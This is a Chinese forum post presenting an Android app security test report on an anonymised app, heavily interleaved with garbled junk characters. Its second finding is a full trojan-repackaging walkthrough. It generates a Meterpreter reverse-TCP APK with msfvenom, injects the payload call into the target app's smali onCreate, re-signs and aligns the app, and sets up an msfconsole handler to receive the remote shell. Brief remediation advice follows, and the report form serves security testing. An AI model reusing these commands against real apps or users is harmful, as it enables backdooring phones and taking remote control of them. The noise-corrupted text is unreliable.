: f4 G( [+ @6 c* n5 e9 s' Q 2 J" P o; G8 \; H   - @. Z0 _' a% s, ` ' T7 p H% l& }/ h" M$ Z

, s8 L; U, R; } ~; d8 F/ u 1 u: }" v6 T/ f! K+ W! J

: k& f/ U% C) h" X" d * Y- W. t! H0 X 1-2 测试结果 + e, D$ j0 R1 R* _1 N. K8 D 5 J5 b4 P0 y) d, p

& R& j" A; ]- p* p8 W4 r' X- f+ N1 V* f! h- r+ { Z9 b: M

* B& I7 n, ]# A& `0 J. T 7 Y& r; m* |# ` ^   ) P5 {. J* D J0 t9 g 5 i# f8 `: H' N4 C

( M5 b! j, }) T B4 F. b5 S * `! o/ O) C4 a& g/ v

/ d* {; g$ q% H$ N0 t1 H, l) [; o/ Q 2 检测结果                    . E- |# K3 k, W( V6 { $ c: d1 n0 s' ?

/ i# J5 a/ E, u7 ]; | [! B & O; ~ d3 D3 H3 `; _

5 A4 ^5 t0 T4 F8 } & U8 K v8 P7 k9 _; l' N 2.1 某某某 w9 B- I- E9 } 0 @% p! [% a# T7 c5 q

( X: s9 U6 v6 D ' u- Y* W' ]6 K8 \. T" w8 E* g

9 R. a- Q4 M, l ! S, |% j- t% {8 o9 Y; I% y& g 2.1.1检测目标 ) `- H4 @! x. T+ z4 @& o8 z! A7 G , U8 g0 ~$ b2 F( G

& i3 W) P* K! A! Q) r5 D" p( G 1 g+ T. t1 K7 @: H4 [, H! b& z5 S8 `

; W2 b" `( V% f& w % E9 R1 w* ]4 q; J7 g! @. y 目标地址: 某某某某某某APP 6 _ d. J; Y, R* N h; Z1 x! \0 R1 R6 r! Z* |

% \# q. _( r. @0 E& X+ m 3 ]3 [7 `+ l4 y5 W% ?- b

3 ?+ m- H, ?- k # w0 a6 m% x' t/ @: S" T 2.1.2检测结果 ; H4 b" X1 @7 x2 Q + a$ a J# |, g! O- U' ^& h/ r( I# |

! t9 J# n0 f6 T* W( M2 X7 M9 l( }" H+ D+ H s

& y3 e2 q; m1 a& s ^ 3 O, ~2 n6 ]( w7 z4 p 2.1.2.1 : \3 v4 F( V' f3 h' C8 V. p/ g7 p# c) _4 r, z1 ?/ k1 G0 k

1 t% k3 T( B4 e' P$ s3 [% m( L% P. ^; J0 l+ i, U

* H) G! B4 \; ~; j: R ; D6 T1 _# y8 d) [. f9 } 漏洞链接地址:某某某某某某APP ; ~7 [9 c) L# Y8 y: L ) n' I% H- U% I Q6 c

* c* N0 B1 [' \, |* E 1 P+ p; S* ~3 h$ y7 s: u) E

$ E* p5 S( u W D, n \" m 9 d9 c5 ~# J6 X. e# ]) G   0 _/ b. U+ n6 ~1 h . V# q0 H: R# `/ a7 M8 U

8 h' v$ k: v2 m) D' V( ] 9 }" V D( F* x' ]

1 O* l0 J5 E# {$ }! K- r 3 m7 r5 w U- d- L+ s8 n 漏洞分析及取证: ' Y8 L/ |' L0 n0 U 5 @: D" w, y; B2 |

5 h% f# K& z8 Y - W6 C! X4 V& y4 W

" I' ]6 m7 \% ]3 e, f: } 0 v4 n# t( l g7 ^3 Q; \2 z; T( X                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: * s& Q. e: ?+ Y# ~9 K7 F2 M- Q( X 4 g7 c- y0 ]) F# j) F

9 O3 u; @4 ~% t8 }% C0 p( W2 O6 @, d6 ^/ e& C( n

4 G4 |8 j, [7 Z2 J4 [2 Z 2 z* T7 {7 m- O6 `0 D) b      5 i4 x6 d9 p7 M0 M! p- t& _# H : \: B3 G$ P% [6 u4 y' a

+ I; l- u, G7 U) L$ T * c8 |8 ~$ ]3 @

5 V: D! F$ W. o3 A! M( d " @; R |) e4 ?6 |# @: U$ v. i                       - k% o- p0 x+ v" }. U- L: Y+ q ! o8 u. Y9 ~5 E: C

1 X- K- K) ~# O3 G, {2 K: c/ l- N' w" O5 e

% r: c f+ R$ {. V( G$ O2 Q/ x" k' x8 i) L ; c8 I7 B( a+ X. f; \( G" D) h 7 w* y3 K* C( n; }; Z \ : c0 |( a S. q8 f3 ?3 s; `* ^

& R5 z Q" s) V% S, J9 O" S- a $ h4 F2 m; m! p7 B

4 _- c' D: U% O5 D : {4 J0 T- b; k4 [5 V ; W% b% Q4 p& D' @0 C6 S I/ X5 [8 B# e ; l/ \. ?; x: Y8 t3 Z

0 p4 `( k' m* J/ S6 q( K 8 U3 Z! @5 m) \0 i# u: s. f

1 h) S. H" G" k ' P% B! g* F0 M$ r8 t) M3 J 8 f& X2 U, X" x: X; y# O 1 u/ e4 {! o" a- S( F$ o; C& Q

5 N" D4 ^8 o+ _" `' | ' J! U4 l# A) m3 ~5 y

1 b( S- D* H4 W3 j; D9 \3 u . Z9 ~( q1 A& Z7 I8 g1 p) j! `) F 漏洞危害:高 * v' n1 U. c N+ {7 M. b 3 ]. g& G& p" X7 I! r0 L% c( l" p2 u

) L6 |9 J1 z1 b2 u/ W" g8 A " h$ X* q: P; v
! C: V% h8 r5 {5 G5 f7 d0 B2 v `' B9 y) S- u : I& T! N5 g5 w! s3 V4 V1 | C$ Y- |+ Q" U$ T) F. W" E+ [# m! t' g3 D2 {) @9 _3 k5 z% o3 t. D, D; g0 `: T/ d% Q; p4 p0 `) z6 ~) t1 B' F, ~! n' P4 @5 y% i. v& W5 @ r5 L5 k/ F B& q' W: I2 U! Y' q' p/ a, |& m; N& k) t2 M# ~2 i3 u" W) g) d2 v9 e# ]0 Y, T/ A; \2 z+ u h! ?; I" d. A& N/ T/ c( G2 X& U- U' n, h/ M4 m8 A# [# s- l: S& O3 ]$ ?3 a: l/ s H% F! R4 N5 U) q1 ?3 i2 W- M1 A: R. {4 |; g7 T; Z# M; v9 C; _! j2 l) t1 _+ ?3 O `, Q- Q( }8 `" A" P( n& v' }# L+ f/ ]5 g+ d( k9 x" A# l; Q, G0 G+ V6 a. i) F7 p' C' I8 ^) F) M3 N* W! p5 a; Q6 k
/ T6 q: P! q) i: S2 p6 O & A/ u+ J y8 A+ F4 o" Y) f3 k

% b( _: C! T4 G8 c5 G; K 0 U n8 j; E9 x/ i 严重程度 ' |" h J' h; ` + R6 b9 z5 {( X& V! }) q. Z3 M8 \0 o

$ |7 Y: C+ g) {' o' D( M ( w* F* e# s7 z; t0 E
6 C- b& H8 ^1 P8 a$ O. P* j' _( u" Q9 H- ^) Q) s' I6 ]

5 Q& r* z7 J8 z 0 n. Z) d0 j- z) c8 c + r, G% l7 n0 z/ I: e & w- s! S( Z9 J- l% d

: p( c" K$ X0 y" o& L. [4 A$ Y* |+ e" G) G7 z1 R6 C' ^2 e% V
3 o% ~5 ?% Y! l( i) o% s+ Z1 ~2 o/ N3 a0 I" {) i# K: V8 e6 \

" y. T+ N: M% }5 E- d 7 y/ H& m" x$ Z " ^) a) |) y6 v6 Y . T: }2 W& y0 W/ q

' l# V: T w0 Q7 [: h! f! X; Y 0 }. m9 j( x3 ~0 h
+ d/ L5 ?" F! S( n+ H 6 s5 |9 D, X4 K0 q* l* P6 B- {

) m. ^6 X& v, Q3 W" P2 g4 B, U' B3 [ 7 s9 @6 D" T, |: `7 C4 C$ t 2 q' F* ?9 @+ _" q0 ^

: M6 A; N) D0 }) n6 y3 z9 `, M( j5 O
# O/ D+ I3 ]! F9 I' }; T. A 2 S4 A3 N! `" g. y

2 b s6 Y. x* d& |& w9 q! y 1 @8 f( M; g( M: m/ l   5 D6 m" C3 }6 r+ V+ }& Z. C+ b5 Y4 X, |8 ?) g! o, L

& N8 h+ D1 k- D1 p9 E. {% m4 b# G2 g8 G
+ P2 s, \ L6 T9 b9 @# ^$ N 1 X6 n, Z6 u9 X3 p1 ]4 h) e

2 J$ ^# U3 v( F: h0 T+ D/ w" P 0 a5 p4 @6 B* B- C' f 3 i5 u9 Z* Z) p 1 P, u! K: e) ?6 x4 m

8 o0 F* z$ h5 A K; C; ]# o 4 l8 Q5 m; V7 O
! ~1 v. Q/ L/ Z9 |' _0 J2 |6 \& A : S9 D5 i# w" f4 ]2 v

' [' k5 t0 r: |: V$ D. N5 Q6 K 2 y2 x- K8 @# e7 K; L% R* l- o6 r9 p   5 m" q O+ f0 Z; {6 V7 ~3 s9 S ; U s V1 k1 Z

, ]. R2 G6 a: r6 S0 b$ [' `: |: `7 Y Q0 K
- s" R! {9 H2 K( p6 t4 s " g7 A% D- n4 b5 _, _' H) s; ]
, {$ L) J$ J9 F) k: G f* f/ a3 N / M% c9 S4 \! G+ C: i- [' ~+ Y

. V0 s$ H/ N- a4 n 0 h- l* Z5 m: e- t4 `; V   [% j3 y/ d, L; s " }, n2 ?$ V. G7 q; B% i

8 l$ x; Q/ P+ J$ f1 }8 i8 x% Q; ?& [8 z# u8 w& f

& Q8 a- Z! ^" R/ G4 n5 m ! Y/ p. _; Y+ e( M! w* S& P* v 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 4 k T+ x2 a, z$ a n 9 h. X6 }! s& T9 y1 {: {

7 \# `5 D+ s; s* E/ K & ^3 t ?2 ?- v3 Y$ _: t( S

* u4 F3 K. O, o: s+ H5 h & F/ ?$ M. X; C1 \, x0 m           ' W5 r9 L: g; X2 x 0 @% ~1 V1 V$ ]5 J' e; `

# M/ Z, K; t8 J# \9 n' ?, q) \( J0 M1 Y5 ^1 W, N

+ l& x" I* ?. o" v ; a) a/ O/ t) w+ }8 ^   " M& h( t K1 ]+ S: p 6 @9 c, c. v+ r3 _( t" t8 S# B

+ i% g) D: M( V/ I" ]- C# x- D: n3 d ) N5 A! y! Q8 }3 P6 e Y

2 s# x* ^7 b# i3 a; T , T( ]' c$ G2 F 2.1.2.2 & u) ?! i! d( l& d5 v: I/ d: g2 S( q2 f8 O( [$ f5 f) R

$ i3 y1 x' k. B% |- k2 c 1 z, ^1 T4 T9 _

6 J; A/ F7 u5 w5 Z 0 A9 C: T# S I( @ 漏洞链接地址:某某某某某某APP f$ a( m$ l; {9 X( F9 J: ~, Y7 w/ m- @

! Y! J5 n: F @+ S. \; i4 J r- F' | 0 }5 g7 I0 ~+ H6 ^* ]

# Z8 c% g' c3 B0 }, ], Q* f$ F% P! J0 p5 i5 X" f 漏洞分析及取证: # ]1 d. j! U7 T" F3 D 5 x' A$ f- x( \, ^2 n

. H/ s3 f5 \! e- [+ n. u7 X( h" ?; g8 k, w. g

$ H3 l, L6 G$ p R+ a ! r6 K6 w4 h0 Q( V/ ?                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: & [; G2 H1 x% P1 K9 {1 `- C) p9 B4 \' t& w) \9 D' n$ [) T# B7 s

2 d; k1 F- A; o. C: K 0 A- b% C* v3 y! z' H- g- ]

: O2 l2 N! @. n" ?3 Z 6 k2 i0 S! d ? Metasploit 生成木马 apk ' W& M! n7 B" |# Q& Y/ _ : |! ?7 p$ P( O \

6 M4 u \. [3 ]- X . P" _; g0 m) A$ a1 h2 h( G: f$ ]

9 U \ A$ J1 X3 m3 S6 f8 L ~' n, Y6 r# v0 h5 u3 p! u! E. Y5 p msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk : J0 B1 }. C5 r& g3 M( V9 ~ ' V! s7 f& l. [) M( H

3 `/ \/ a* @1 Y# N' t. D1 \$ x, S( |0 I- i! p4 f e1 t& }

5 X7 o4 ]( m V8 G0 ?( X ; p8 F8 }0 D. S5 N 反编译目标apk和木马apk $ k; U9 j2 L" }0 E: a! h - u7 a c- y. C! i8 c5 H

: A" A; Q3 n# A: v4 H, B) `$ i" q& a

3 \8 v4 c! `, k* ~& G2 a- S ' v( J7 k" \3 J apktool d target.apk
2 m; L) G) j+ l0 d. G# ~% |; ?& c; _/ ^. S0 K apktool d cockhorse.apk
5 i3 D) j9 b4 ^) t+ X; I; {5 ?* [, S6 x" o" M

7 u" I7 y9 u" \; y) I+ P, E ) X0 C8 Z& ~8 } |. Y! {2 j) R) v

0 M% N0 o2 w' x0 s1 W3 R! V# V/ l* ~- f, \& j: U. w, } 木马 apk 注入目标 apk 6 ]$ ]1 Q1 }! z9 T 7 E' X; L9 _* Z8 s

^! d) P4 _. i4 [& P/ K" m( E + Q7 ]% }& ~2 N% \: u- g! |0 Z

% }: M7 U2 i6 ]2 G/ N' ^ ! @# B$ P6 H. |. a 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
& U# p6 w! |" } Q 1 d: }7 s" H$ m4 j* I invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
" [! K$ L) s! `/ l& l; ^ G9 w7 P* d4 X$ D6 h& }9 w8 w) k1 T

- s& K5 w( [, d8 w6 ~2 h2 |: i 1 A- N9 o" M+ Y8 |: ~

" K8 o' Z0 `4 a; I% l, o0 M8 g/ n. P2 l0 @' J/ Z M 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 : Z3 u5 G/ I/ P9 m5 i$ p , W3 H+ O+ K# k. Y0 N+ i4 S

* o3 @; o" [1 q6 ~: G$ u( v. X( L & |+ L3 |; r/ l; s; r

1 x. X( w# I8 o9 F- B# F + H5 r6 C/ d/ o. C/ P; P# I 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ - p& }+ g4 ~$ |1 e5 z * |7 g3 Q) ]' G- G' U4 N& u

! Q& o9 z& L, m. D& ]1 a" W# m 1 D- Q `6 B; d$ z6 H9 |

: \9 h9 X$ V: ^+ Y8 F * H |8 D; m( F 回编译生成最终 apk ) m, t# l& o0 t/ J: u. F7 H : g! q4 U1 I; s6 ]6 R

$ I# b' ]6 j" \5 \+ k# j% L : ?# ~+ P. i# C+ f" E$ [4 R

8 e) o& P, P) Y1 J: s+ S9 a& R! f- Y9 f3 ~1 L, H; U0 v% g4 N 重新打包 7 }. t; \1 h% J! e8 _ 1 w Y7 K0 D1 `3 k! ?

' }* I7 _% X: B7 B C/ m8 v% } " t' O+ c/ g( b9 d' \

8 d2 U3 M2 ~; j9 J+ U $ |5 i4 p& M; ]# c C' d apktool b -o repackage.apk target_app_floder $ ~/ h. B) n# x. e! ` 0 b4 x' b, U, u+ s4 [' n$ e( {+ z

, t6 [1 e6 M/ W5 R X& }5 O9 a) L# ?4 j( ^2 l7 |" i8 u4 P- \

4 F% o5 h( D) t$ a 6 H ]; `; t3 ?0 n 创建签名文件,有的话可忽略此步骤 5 ^5 Y4 v3 v1 K& m/ c ! `2 m5 U5 m: f5 z5 z1 V ~

8 l0 F5 O, ?- F! V7 G; G( o* t- f- L1 D# _

2 u l- R4 w. b; d/ _3 X8 v % P6 _0 g6 X8 ?) ^/ h* k6 [% { keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                ' v4 Z3 L: F6 }! \% V- I5 v% V3 ~7 \

$ v, L# E( @- ` ) O9 ?% w1 G& s q

6 L* b: }2 {9 `: ]/ d. A ( O3 R" B& ^7 ^: O- a9 N 签名,以下任选其一 $ M! w# ?8 W# U! B" x7 s( q + ~. u6 N! r$ J- Y( M% \1 J

& F0 b$ {! B' |2 |- {' k6 z2 Z* V& o+ m

b& s" ~1 m6 u# X4 u+ m0 S 8 { H- e# K% b8 E7 u/ a jarsigner 方式 : H$ I$ @1 ^! [ S' r - Q1 |. V0 ~* x1 ^! q

& v2 L/ S9 n, Q; s7 o; I. [- P # ^* ]( ~8 P' Y+ h" S6 T" Y5 t

7 b# o5 s7 N9 u7 n9 a5 {5 _ 1 u# C: z' E- p8 v0 E; s' N6 t; T jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname , ]5 g' a! B( @9 \- z0 | 0 |# g. l( N2 i" Y' y) G a

( v! A4 {. {- B. b ; y* P$ f# l9 L9 Y- S* k

$ A# i6 U% e7 n+ H4 J' Q4 p & M7 |; K% A" J; w+ w apksigner 方式 7 G1 s9 E$ l! H8 B 6 u) s- f x: r1 z _

" Y1 J) s( l2 R; V! X5 n3 {0 b/ I/ ] : @- e, X: U1 _+ K* K

& l7 C" _7 e4 u $ {! d C* y7 n* E8 k: _% q apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 4 L9 y: w5 A Q! M9 c0 ], Z0 M! o% W W

- I" }+ U& I1 {$ G1 {( ` % c2 S) i( W. d. ]& t! Y

1 ~! n1 I, u W$ L& |2 D 3 S! g% V$ B# Z8 E! P9 \1 Q 如需要禁用 v2签名 添加选项--v2-signing-enabled false 2 x0 U% A+ P4 Y4 ` 2 r, A" x1 E0 V: I

* `& e; Z% Z/ Y! O+ U p! E4 l" u

7 B6 j1 E$ B3 H6 g7 s0 i/ \" D% r 验证,以下任选其一 4 n3 k7 L7 x9 \- G % m8 |6 j9 H! i! L. b5 d

3 t) F; `7 @. Y# N ; Z7 C3 S4 f: q6 J$ c

! V* a, K7 Q+ `' s/ }% L8 E- Q& _" _' f. C- W jarsigner方式 ' F7 P8 `0 e$ F! K & o6 U! K* S1 Y% x: F

4 g3 E* c1 v+ l( ] ( C. s3 g% }. y, E

+ `' W8 |4 B: s + M! \( b9 f( b- ~ jarsigner -verify repackaged.apk 4 s D; [: M* l$ R : J: n7 f! m' O( N

( E( l! ~5 \6 y( R- J3 |% T. Q' n , z/ }6 k) n! ?6 a* ~ c- @! ~

8 `$ k; D% e0 a $ j% Y) a3 F' {% G1 G0 A. h$ k1 w3 Y apksigner 方式 5 X3 p0 X- m% c8 _& Q2 B " C# c' `3 Q3 C# C" ^# J! o! u. q

# V: V. z9 O" F, O5 Q$ v7 o. j& D 8 Y+ {: [2 w, T7 V' t, g; G

1 R- |6 G9 t% A G ( R3 L9 }5 B6 k apksigner verify -v --print-certs repackaged.apk % a, |4 X" j* k! E" M % W9 }2 A7 t; \: ~) J

# J, h+ g0 G h1 N/ @3 s( r) t. @ $ ] j2 {0 f# B" R

: \1 n5 r+ ^ h' A: S . [4 C8 H' S& {: h keytool方式 1 ? z. z4 v' }% Q' B1 M/ t. H / @# K$ X/ ], a( P& ?

]" p+ f( R5 e& o2 J" ]- _ ( n4 l3 ]; n; A! k

8 S8 H5 p. }* h( m1 ?" P9 b 0 e0 M" o4 `0 {9 g4 P7 h keytool -printcert -jarfile repackaged.apk , t, m8 n8 t4 J B0 G( \7 U7 r5 S, n% _5 u

8 y, e* a5 Y' s2 ]2 b: |3 v8 y / Y8 L g1 }" \9 Y

; [* g: ^% C0 }9 ?, R, t/ a' N; ?* U7 e9 Q, W& Z1 |) F 对齐 4 B, _; U, P# o2 C; N. m9 q* B4 U" |$ T7 X

0 z6 n. [$ |! u# R, E _$ u; G) V & |/ c X1 U3 v) ~. |+ X

+ H6 _% O9 I% V& Z) O- t 7 D/ S: t' ^# w4 T 字节对齐优化 7 p2 s. i3 u3 `/ I5 C6 R$ N " ^( }: N; P* U8 H% a

' l2 c, N0 ^. {4 m+ G) Z- z W$ N. m& d. O C& [5 I9 P6 t

3 @" b# l! B% m1 ? ' x5 F4 m! ]" B7 q4 e0 z2 i zipalign -v 4 repackaged.apk final.apk 7 q( p% V9 g% g6 G& r4 z; A: R7 a5 W

# q0 Z0 D# i. U! c$ `6 J d) t4 r/ L

3 E% S }8 E- q ^4 ~3 X8 w! i% C' W( b 检查是否对齐 , p( g1 ^( K7 f2 F ) o1 B3 @( ]: p+ A- c5 y

9 u0 r( o$ ~ P7 L% V ! n7 \- H5 l# `- ~9 u' A9 w# L

5 |) N. e% \$ Z8 R5 ~ : d2 Y. {, E7 N1 ^5 f0 n zipalign -c -v 4 final.apk ! q; w/ _, q q* K3 e' ]# N 4 k7 O. Q B( r

) W: f: W9 D0 `# K% e. U1 X. y; }' |! e9 X3 Q' V3 r

- z( n: d+ v0 Q4 _/ f5 D 7 E" t' @2 B& x3 }& ? 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 ( c; X- S4 Y! m. U$ _4 g) d6 e* i! P# C( W5 i+ a2 T# N4 ^

: ~) Q8 t0 c0 G- Q 1 a9 |# N$ d% G

2 n j/ B! N5 @( S' `% t: W ! r" [7 Z2 N9 h! y- W 启动Metasploit控制台,配置参数等待上线 ' c# j5 @* d( y; ]; m% W+ E7 N# d! }* x M: j' x) n

$ H2 o$ m6 W; A8 X 3 P5 x& J* { Y+ w2 C

0 A1 X* D# w& G0 d/ j+ e- a y6 o# g8 x, E/ o2 r2 v6 } 在终端依次输入如下命令 5 H, a+ G% k7 J, p 2 e1 u: W* l. W

3 y% q2 m( J5 `' `: c( {1 y" N2 b! w6 A4 J/ b

' t8 x9 B0 q: q' R1 n4 m2 L _( b; ?- e. [& o6 U2 m# }7 n msfconsole 4 ]6 g4 _- }8 E q1 b8 S 2 l1 Z7 ?" m! D$ X1 U

" e; ?& v- H6 j# E, m , s8 {" L+ M5 p+ q' j6 U

- B/ |6 D$ z; e* k0 ]& i; R' Q9 Z : M% F. s! `; E- E/ \% | use exploit/multi/handler - @% u4 P# d! l4 R1 n) y ' _* e: U# {+ ^4 p8 s6 w8 i7 k' y# B* x

* y* ]4 k3 p% M0 C: I) K % c& [7 A( }) r1 Y# z

+ X( i3 \. @- f }% L4 z % x7 K0 H- g+ e# \ set PAYLOAD android/meterpreter/reverse_tcp # D7 v# P$ R+ y5 ]' Q" p3 C8 {- ?# [. |* J( A

" v1 c' T! V; G& V! u ) w! W$ G+ U% d! p) \, E% ~

; @3 P5 B) H$ j" x# C 7 r+ e( F; C- ]) Q set LHOST 192.xxx.xx.xx & s9 v4 p- T( ]0 v4 b 1 |9 z! J; ]& P

, G [) G" c7 n; Q* j9 T* } , C* p' D1 g- b2 A# |

- E0 u! g0 b3 P$ a8 D8 f 4 `0 D5 j. s9 t3 X! l* r9 F1 h set LPORT 4444 # Y* n& y3 L% c# d6 ?8 h- j : A: b' p( R* y

- F$ D& n9 d: D5 R) g8 |' A4 H$ M+ `1 [' T. E' v. v$ ^# c

+ _" C7 ]6 L2 g' K' Y# u- a/ K3 t) z/ V' j exploit q1 y- m! U$ H 3 y/ b& F# _- {" W" a& A( S

. x* \+ Q' h7 l2 z/ _- o; I ! \: g, L, X1 D/ I+ X1 b; j5 A

2 n }8 K5 w- Z3 t m1 ?3 u' i0 Q2 ~, V7 b% Q& W: ] 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               4 t9 y5 o4 F n8 Q: Y( k1 z* v9 r 2 f6 o$ W& |; G

. _4 k' f+ e& E2 v0 Q$ d+ i, P/ J3 Q5 ?

- A$ T, S5 M0 u1 C6 w6 i" |( z . l# H9 s C; B [4 {+ K5 R; i# m 漏洞危害:中 " `( ~- s. U) x b; m% U2 C: ?/ p; P; m: w% Z' Q2 q! \1 p

' S$ ?5 \: l- C0 R- F 6 |$ w" l* l, Q6 c7 |
; ~+ V. v4 S3 M5 ]5 l ' E% a0 Q! m' f 2 r. K0 J: u, w. J" X; V8 X( z' J' c( i7 A( ?( ]/ O& l3 @0 ^ 3 b9 `' o! s6 v4 V- ?' ^5 i% ?. x6 j( U- @0 S3 K. P( I1 J# D4 ?5 y, f: a5 z3 L/ F3 F& |% u+ B5 }7 i4 t) S3 ? O) L% P% c5 T7 _# a0 V' D1 H0 b8 ~7 z; {0 ^" u @9 x, L: @( j1 z& I; c' u: \* f9 i. ?# W l: r) o3 M5 [* A4 c& l0 `/ g6 j3 {( A% Z; Z- W8 R3 @# M2 l. m& r( [, n" V. `, q* h) ?5 U& Q8 C1 ]/ P1 m9 e! M& H/ O6 a' z7 Q9 L0 }# Y& v. O/ J# V7 \5 I- S3 }8 B( A7 U. u0 n4 r+ E0 y1 _8 S$ k; \8 i" t6 ]6 a1 w* n4 V, Y9 S) B: I3 u4 p1 s u* S5 ]/ P; ~) `$ I& d b3 ^1 V+ K3 i9 R B( Y W p a- a" B" |; p! @' A, D" ] v* T; K$ l+ u: f2 J* d2 G6 }) A; s- V" E+ F
; U, K d' c+ s' h 6 W* h1 b5 F) [* z: W+ i

4 u# u" G4 `! Y3 q$ j$ o ) S6 @+ y$ ?3 D" w4 B1 s 严重程度 ; M) q; C$ x* \ I9 y3 a% ~' \ ; U" g- s4 Y+ U+ ~' |: B

0 n* D8 j5 l& P ; d7 W7 Q3 F: Y( L
! ]1 _ ]. q; g( g: ?" {( {9 g % X* w. L" k3 D5 {; X5 [

" h9 [5 L' d2 \3 v: ]7 ^ ! ~1 D8 [$ h3 P% D K- H9 @2 @ f ; V+ d0 J7 B7 V) m 1 I' \/ v" Z0 z/ ~1 t3 H! ?* C

: k- P5 _" r2 W v( y ( T# i+ S1 ~. ^# `
6 f' j$ o, |1 L1 a. C" N- y5 ?8 b: W: F+ Y

6 N/ w; }7 h0 V3 Z6 s f4 u) t4 }$ T! h2 H ! N+ c+ Q% d$ v* E 3 q, o% q e* _

7 r1 l: S: b3 d, I! ^ 7 b* g2 G+ O* \0 p) D' U2 C
e9 C7 A l$ v0 b$ f/ @4 k / X+ a/ F0 ]$ a) a5 l! D5 L

2 N/ n: @" E6 y6 p( Z3 y+ A) @2 E3 l# i% J . t/ l* i5 j/ v; _ " w% f2 h7 u* p

0 g" D" N( R8 B7 X 1 i; R! c3 x/ V( t
+ C' D7 r& y. Z! c5 d9 ]% ^/ c: _! B7 G" v, t6 x/ f + m" }; k2 {# ?$ @3 t % q V! ]/ s# E3 |( U7 H. w! N# B2 R& Y

! c4 e( P5 l: b; M7 f5 W" ]# S$ u! n" H3 C! X   % l( |6 ?( e1 U) c( E5 X4 H+ H! {6 r' ]* P" [2 ^7 W

5 N w( }: i# O6 U' [ / h$ P a' ] O D
* P: c, d8 J0 E! f+ C & Y M1 p& ]4 _6 i0 o6 z! L, j

1 i/ U$ U% W, X D+ w, A 9 P5 O$ N+ J+ P* v$ J: }, M " R+ Z& g7 X7 m0 k5 `' E8 S ; w; Z0 q# ~' G6 Q7 R

- {0 Q# G) W: @! R6 h4 U I" E `) }5 Z- Z) Q, F, m
0 o8 @; D! h. s8 G( H/ x) C 1 Q) N! e( O8 f* M Q5 M . X3 c4 {, Q9 P 0 ~7 @4 t% Q6 x; Q/ B( N

# z8 t% p; a+ V# j) V 7 s2 m s& b4 s+ J3 h   - k5 \; k/ s% y- H $ G8 q) n8 [6 D

1 j3 O7 X; {3 W , c: k$ z. S( h3 j# Y% E$ v" D, W
) d! Z) O( ]% Q$ ]) T & S# ~ b) A7 w7 f5 V. |) O# u
4 F/ k N- w- J! \6 o 7 c6 \1 ^6 G, e6 ?* m/ p

8 x1 r1 r; D0 d* {) j " z; u# X, o2 g+ {   * ~7 B' U; c0 A9 X4 {" k8 H9 ?, C6 N* ], v( T0 v. f: A" N& B

1 ^& u& C% [ O$ y0 F* ^; y" N3 w4 c

# n* Z2 V7 R( m4 z$ @; H) R% x- {" G* m4 B# N7 @( j0 f! Q" e1 l 修复方法: ! W8 P9 x+ W! }( U: ^4 `/ _/ A% _3 f( r0 E* O% ^2 S

$ X; r% a2 A0 r4 c$ p9 L- K" @9 }; ^# q* ^2 E6 [

7 }7 W0 M" t1 K+ Q0 Z6 i+ {7 d( I0 q( @/ Z2 m               1. APP 启动时应做签名校验防止二次打包。
# G+ k/ o# u3 A& o% M @4 }2 K A& @% ^1 X 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ' c3 m* ]3 X9 I% O& {/ x6 \9 ?' h1 V/ I# ]. o

* j0 K: |" C" v4 H+ z3 [9 z0 y( d5 m4 z2 C7 u) y) f ! v# ?4 \9 E0 Y" a 0 K! K$ Q+ [4 z! p/ U! `" C

4 {$ ~2 r/ b+ h/ N4 x' Y5 a* b' g2 n7 K p- E   - [- o/ k: y0 f. T1 j0 O8 O " m. s- ?0 O; T# k! q& m C

v9 C3 U) C. D( k2 e! M0 b$ z. h% T' c5 W( Z. O( ] . p0 n) |1 y$ a4 O( `8 V * m/ R0 N1 A$ d$ J$ H

9 `. P0 }& B# t* ~1 Z+ i$ l ! Z+ t i2 t! H% _( f5 d: p
" Z, q, L$ }! k- q" l3 Q5 {* ?& [4 P/ M5 k* H

9 S+ z! O: Q o. ~, I: \. h ; H- X: r% i" L- {* b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表